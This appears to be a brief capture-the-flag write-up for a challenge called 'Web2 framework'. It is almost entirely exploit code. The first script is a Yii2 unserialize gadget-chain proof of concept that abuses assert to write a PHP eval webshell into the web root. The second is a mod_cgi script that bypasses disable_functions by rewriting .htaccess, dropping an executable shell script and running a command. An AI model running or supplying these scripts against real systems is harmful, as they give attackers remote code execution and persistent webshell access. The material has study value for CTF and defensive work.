Web2 framework

Yii2漏洞 about 路由反序列化 直接网上exp assert 写shell

```

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("/var/www/html/web/a.php","<?=eval(\\$_POST[a]);?>");';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){

            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    class RunProcess{
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>

```

写shell

需要bypass disable_function

Apache mod cgi 绕过

 ```

<?php

$cmd = "/readflag > /tmp/1"; //command to be executed

$shellfile = "#!/bin/bash\n"; //using a shellscript

$shellfile .= "echo -ne \"Content-Type: text/html\\n\\n\"\n"; //header is needed, otherwise a 500 error is thrown when there is output

$shellfile .= "$cmd"; //executing $cmd

function checkEnabled($text, $condition, $yes, $no) //this surely can be shorter

{

       echo "$text: " . ($condition ? $yes : $no) . "<br>\n";

}

if (!isset($_GET['checked'])) {

       @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed

       header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked

} else {

       $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?

       $writable = is_writable('.'); //current dir writable?

       $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?

       checkEnabled("Mod-Cgi enabled", $modcgi, "Yes", "No");

       checkEnabled("Is writable", $writable, "Yes", "No");

       checkEnabled("htaccess working", $htaccess, "Yes", "No");

       if (!($modcgi && $writable && $htaccess)) {

              echo "Error. All of the above must be true for the script to work!"; //abort if not

       } else {

              checkEnabled("Backing up .htaccess", copy(".htaccess", ".htaccess.bak"), "Suceeded! Saved in .htaccess.bak", "Failed!"); //make a backup, cause you never know.

              checkEnabled("Write .htaccess file", file_put_contents('.htaccess', "Options +ExecCGI\nAddHandler cgi-script .dizzle"), "Succeeded!", "Failed!"); //.dizzle is a nice extension

              checkEnabled("Write shell file", file_put_contents('shell.dizzle', $shellfile), "Succeeded!", "Failed!"); //write the file

              checkEnabled("Chmod 777", chmod("shell.dizzle", 0777), "Succeeded!", "Failed!"); //rwx

              echo "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;'>"; //call the script

       }

}

 ```